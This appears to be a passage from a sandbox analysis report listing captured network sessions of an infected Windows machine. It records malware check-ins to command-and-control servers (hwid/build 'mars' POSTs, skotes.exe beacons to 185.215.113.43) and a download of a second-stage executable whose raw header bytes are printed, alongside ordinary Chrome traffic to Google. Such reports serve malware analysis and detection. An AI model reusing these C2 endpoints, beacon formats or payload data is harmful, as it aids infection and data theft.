Nov 11, 2024 10:34:59.758858919 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:34:59.762854099 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBKJECFCFBFIECBKFB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 2d 2d 0d 0a Data Ascii: ------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="build"mars------IIEBKJECFCFBFIECBKFB--
Nov 11, 2024 10:34:59.965564013 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50183	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:59.177676916 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 11, 2024 10:34:59.822156906 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50185	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:35:01.469255924 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 11, 2024 10:35:02.105820894 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:35:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50186	185.215.113.16	80	2888	C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:35:01.727094889 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 11, 2024 10:35:02.366182089 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:35:02 GMT Content-Type: application/octet-stream Content-Length: 1845248 Last-Modified: Mon, 11 Nov 2024 09:18:03 GMT Connection: keep-alive ETag: "6731cbcb-1c2800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 d0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 6b 00 00 04 00 00 7f 5e [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"j@k^@M$a$ $b@.rsrc $r@.idata $r@ p+$t@olxddulo0Pv@pxsrqflzj@.taggant0j"@
Nov 11, 2024 10:35:02.366202116 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:35:02.366214037 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:35:02.366225958 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:35:02.366242886 CET	848	IN	Data Raw: be ae 55 ad 90 93 aa 2a c9 3f de 2f 54 16 c3 34 be 1d dc 87 10 78 81 ca b0 17 1f 89 ec ae b1 20 21 8e 00 29 4b 73 0e 8a 8b 2d 9f dd bb 1a e9 c0 68 c4 e1 38 b1 1b 85 02 aa 0e db 84 5b 1e f5 f9 28 61 7d e9 40 85 19 84 96 ab e6 87 32 44 d1 9f a8 06 Data Ascii: U*?/T4x !)Ks-h8[(a}@2D;.q/HLBlFaB X"Vq>,v3qu}'GbPmZyA'+:UZB;D}VH#NJ-V ix.>C0%R$
Nov 11, 2024 10:35:02.366255045 CET	1236	IN	Data Raw: 61 de fd 83 a5 bc 10 a9 fe 9b a1 49 b0 d6 86 a6 39 1a 51 4b 6d 1d 18 b0 24 6b 3c c0 c0 ea a4 9d 2b 08 58 a6 74 1d cd 67 c6 ae 88 29 c4 08 e0 ed e1 13 b5 93 ff 49 2a 2b b7 ed df ba c3 cf 9c e7 bf 49 2d 6c aa f2 15 14 db c7 bc ab 0c 0f 97 e1 70 e3 Data Ascii: aI9QKm$k<+Xtg)I+I-lp:i!{zt?^{SS`Y1]MfqH-';qG,LNbG}#;l\By'=XrO&s9m +% ^,
Nov 11, 2024 10:35:02.366266012 CET	1236	IN	Data Raw: 2b 77 c4 68 1e ce 5c ff ca d2 78 09 c5 ca 89 07 9d d2 4f a7 14 ee d1 84 47 1b 94 19 ea d2 73 9e db 41 13 46 e5 f8 c3 67 16 97 c2 07 ab 37 97 67 1f 47 c9 99 68 ea d0 d0 ee 52 ae ee 0d 48 51 bf ed e8 02 14 cb c9 58 81 d7 6a f8 0b cb c9 32 88 e0 32 Data Ascii: +wh\xOGsAFg7gGhRHQXj22w!SSg)qO.KhjQANy;GD"0f<jgY?o:#XXTR~bpWl)\|6^MI93gt]j4
Nov 11, 2024 10:35:02.366278887 CET	424	IN	Data Raw: 87 0f 9f 58 c9 d9 94 43 ed 02 12 e0 71 0f 97 9a 7c dc a9 c7 b0 12 13 29 5c 18 97 e8 56 98 0d b1 fc e7 a4 24 bb 60 b5 7a 09 67 9f 07 b1 52 2a dd 2c cf a8 9d 28 67 9f 23 b1 4e 76 aa 16 d8 8d 8f 41 ce 9e 3f eb ee 16 bd 00 28 10 50 ba 8a 91 e3 49 f2 Data Ascii: XCq\|)\V$`zgR,(g#NvA?(PIYwfPK$:H$J7Q~PY^8CXnKM`\|R/-[=,GkD9Jo#b)+-
Nov 11, 2024 10:35:02.366319895 CET	1236	IN	Data Raw: 1c ce e0 36 f2 cb e6 4f b1 dc 50 dc 7c e8 11 c0 2f 0a 98 1b fc ce a1 7f eb 62 12 bc 18 1c d3 cf a0 dc 90 a7 cd 4e c5 23 39 20 1d 72 ba ee ad bf e4 dc aa c3 36 08 cd e3 e8 ee d8 ad ea 22 9a db 33 f1 b6 34 e1 96 9f 17 2d 16 ad c3 c0 50 0d 4d 34 df Data Ascii: 6OP\|/bN#9 r6"34-PM4C08+L9Mr9EPjMsST.O01*(H?-@JMsNy3/XS&6,H:n\
Nov 11, 2024 10:35:02.366332054 CET	1236	IN	Data Raw: 12 eb 28 f0 be 09 21 ba 30 08 d6 cb b6 40 91 ad 78 15 f1 21 39 fd 1e a2 7d a6 9f a7 9c 50 b1 08 be e7 51 1c b1 fb d6 af 59 ee 30 da d4 d1 94 c1 01 fb 91 99 c1 fe 0a 09 9b d1 ad af b8 92 9f b8 fc fe aa 24 eb a2 e1 b9 d0 36 9f d9 30 ee 70 f3 d4 8c Data Ascii: (!0@x!9}PQY0$60p2fTe#v~p`,iTETN_M/>0`%^H!1C0^P8B{cOI4OWx~x!9ho
Nov 11, 2024 10:35:02.371330023 CET	1236	IN	Data Raw: f2 c9 fa dd fc 4a 9d fb ed 69 b9 9c d7 c1 8b 23 bd 3a 2a ae 28 ce 10 dc 32 ab 0d a8 af 2e 15 20 3d 08 61 20 cd 95 ab ab 30 a8 9f a7 5c 4a 8d 23 f1 7f d5 6f 75 4a de 6f d5 cd 9e ff f0 8f 19 dd 38 dc b0 6b eb 0b 16 ce d2 ee 84 b1 ca ca ce 8d 32 4f Data Ascii: Ji#:(2. =a 0\J#ouJo8k2OiiY!gG1J@rd#j'ZU3Ovd_}&#rqg,C3[,@d#2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50187	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:35:03.638092995 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 11, 2024 10:35:04.280741930 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:35:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	142.250.185.100	443	7060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:07 UTC	623	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 09:33:07 UTC	1266	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:07 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-1jAymSx-eH-Y--MQHrbQAw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-11 09:33:07 UTC	112	IN	Data Raw: 31 30 65 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 77 68 61 74 20 69 73 20 6f 6e 20 36 30 20 6d 69 6e 75 74 65 73 20 74 6f 6e 69 67 68 74 22 2c 22 62 61 72 63 65 6c 6f 6e 61 20 76 73 20 72 65 61 6c 20 73 6f 63 69 65 64 61 64 20 6c 61 6d 69 6e 65 20 79 61 6d 61 6c 22 2c 22 64 69 73 63 6c 61 69 6d 65 72 20 66 69 6e 61 6c 65 22 2c 22 64 Data Ascii: 10ea)]}'["",["what is on 60 minutes tonight","barcelona vs real sociedad lamine yamal","disclaimer finale","d
2024-11-11 09:33:07 UTC	1378	IN	Data Raw: 72 61 67 6f 6e 20 61 67 65 20 76 65 69 6c 67 75 61 72 64 20 66 69 72 65 20 61 6e 64 20 69 63 65 22 2c 22 34 33 20 6d 6f 6e 6b 65 79 73 20 65 73 63 61 70 65 64 20 73 6f 75 74 68 20 63 61 72 6f 6c 69 6e 61 22 2c 22 62 65 61 72 73 20 76 73 20 70 61 74 72 69 6f 74 73 20 67 61 6d 65 22 2c 22 64 65 61 64 70 6f 6f 6c 20 77 6f 6c 76 65 72 69 6e 65 22 2c 22 73 74 61 72 6c 69 6e 6b 20 73 61 74 65 6c 6c 69 74 65 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 Data Ascii: ragon age veilguard fire and ice","43 monkeys escaped south carolina","bears vs patriots game","deadpool wolverine","starlink satellites"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmR
2024-11-11 09:33:07 UTC	1378	IN	Data Raw: 59 51 33 42 6a 63 46 52 6c 4e 58 5a 6d 4f 46 68 43 4d 55 73 79 4e 44 4e 50 53 32 78 6e 56 45 4e 73 57 6a 42 78 4d 46 4e 49 56 48 42 36 61 57 38 33 61 31 4e 76 63 56 64 70 54 58 42 31 54 44 67 31 4d 47 74 42 53 30 74 54 4e 32 4e 77 53 58 56 78 4e 6c 46 6d 62 48 4e 55 63 44 64 72 64 56 4a 68 4e 44 64 74 53 45 78 79 54 6c 4a 6d 56 7a 42 30 59 54 46 4c 52 6a 4a 6e 61 30 52 69 4d 6b 4d 78 4d 6c 42 7a 56 6c 67 34 4d 6e 67 79 4c 30 46 4c 52 46 56 4a 64 46 42 4d 59 6b 4e 49 56 30 6c 55 55 46 4a 70 53 32 46 6c 56 55 46 73 64 58 6c 53 63 48 56 72 4e 32 64 6f 53 32 56 69 4d 33 52 70 4f 56 4e 4c 56 45 4a 76 63 30 31 52 4e 6c 70 49 52 45 56 6a 53 30 74 30 51 56 56 55 64 57 56 55 59 32 74 75 52 57 78 48 57 47 4e 55 52 58 68 4e 55 31 5a 51 54 45 5a 46 63 57 4a 6a 54 6b Data Ascii: YQ3BjcFRlNXZmOFhCMUsyNDNPS2xnVENsWjBxMFNIVHB6aW83a1NvcVdpTXB1TDg1MGtBS0tTN2NwSXVxNlFmbHNUcDdrdVJhNDdtSExyTlJmVzB0YTFLRjJna0RiMkMxMlBzVlg4MngyL0FLRFVJdFBMYkNIV0lUUFJpS2FlVUFsdXlScHVrN2doS2ViM3RpOVNLVEJvc01RNlpIREVjS0t0QVVUdWVUY2tuRWxHWGNURXhNU1ZQTEZFcWJjTk
2024-11-11 09:33:07 UTC	1378	IN	Data Raw: 55 6f 76 55 45 52 56 63 30 59 32 56 45 39 75 56 48 5a 68 55 53 39 33 51 6c 6c 34 63 55 35 59 53 7a 68 57 51 6e 6f 30 64 6b 78 56 4e 47 56 52 4e 44 52 57 52 44 6c 45 59 32 5a 30 61 47 70 61 57 58 70 4c 59 57 63 32 57 55 5a 53 55 57 78 78 59 55 55 32 61 30 56 69 53 6d 56 42 4e 58 51 30 56 55 38 30 4c 30 31 6b 64 30 56 35 65 45 78 4d 51 32 6c 30 63 46 70 54 51 6a 63 30 53 58 4e 76 54 6c 5a 45 54 56 64 5a 4e 47 64 5a 5a 54 5a 45 56 55 70 68 57 6b 31 6f 65 45 6b 31 55 30 5a 44 65 56 49 33 63 54 4e 49 4d 48 59 35 54 55 52 4a 65 6b 4a 6f 61 55 39 6b 57 48 41 32 62 6e 4a 61 62 55 46 48 51 6e 70 50 4e 7a 52 34 52 57 74 4c 4d 56 46 70 63 45 51 30 59 31 4e 57 54 6e 46 31 61 46 49 34 4d 30 49 31 4e 55 68 49 4f 44 4a 33 54 46 4d 34 65 45 70 6e 65 6a 5a 6e 4e 6a 41 77 Data Ascii: UovUERVc0Y2VE9uVHZhUS93Qll4cU5YSzhWQno0dkxVNGVRNDRWRDlEY2Z0aGpaWXpLYWc2WUZSUWxxYUU2a0ViSmVBNXQ0VU80L01kd0V5eExMQ2l0cFpTQjc0SXNvTlZETVdZNGdZZTZEVUphWk1oeEk1U0ZDeVI3cTNIMHY5TURJekJoaU9kWHA2bnJabUFHQnpPNzR4RWtLMVFpcEQ0Y1NWTnF1aFI4M0I1NUhIODJ3TFM4eEpnejZnNjAw
2024-11-11 09:33:07 UTC	92	IN	Data Raw: 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: ,"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","ENTITY","QUERY"]}]
2024-11-11 09:33:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	142.250.185.100	443	7060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:07 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49710	142.250.185.100	443	7060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:07 UTC	526	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 09:33:07 UTC	1042	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 11 Nov 2024 09:33:07 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-11 09:33:07 UTC	336	IN	Data Raw: 32 38 36 38 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2868)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-11 09:33:07 UTC	1378	IN	Data Raw: 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 Data Ascii: gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
